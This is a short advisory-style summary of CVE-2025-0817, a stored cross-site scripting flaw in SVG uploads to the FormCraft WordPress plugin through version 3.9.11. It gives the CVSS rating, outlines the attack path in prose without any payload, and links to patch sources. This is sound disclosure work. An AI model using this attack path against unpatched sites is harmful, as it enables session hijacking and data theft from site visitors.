CVE-2025-0817

CVE-2025-0817 is a stored cross-site scripting (XSS) vulnerability, classified under CWE-79, in the FormCraft plugin for WordPress. It affects all versions up to and including 3.9.11 and stems from insufficient input sanitization and output escaping during SVG file uploads. This flaw enables the injection of arbitrary web scripts into pages, with execution occurring whenever a user accesses the affected SVG file. The vulnerability carries a CVSS v3.1 base score of 7.2 (AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N), indicating high severity due to its network accessibility, low attack complexity, lack of required privileges or user interaction, and scope change.

Unauthenticated attackers can exploit CVE-2025-0817 remotely by uploading a malicious SVG file containing XSS payloads through the plugin's form functionality. Once stored, the injected scripts execute in the context of any user's browser that views the SVG file, potentially enabling session hijacking, data theft, or further site compromise for all visitors, including administrators.

Advisories and patch information are referenced in the FormCraft changelog at https://formcraft-wp.com/changelog/, the plugin's CodeCanyon product page at https://codecanyon.net/item/formcraft-premium-wordpress-form-builder/5335056, and Wordfence's threat intelligence report at https://www.wordfence.com/threat-intel/vulnerabilities/id/7ae0710a-8c9b-41b0-860f-ae79b7ed1ee4?source=cve. Security practitioners should review these sources for update instructions and apply patches promptly to versions beyond 3.9.11.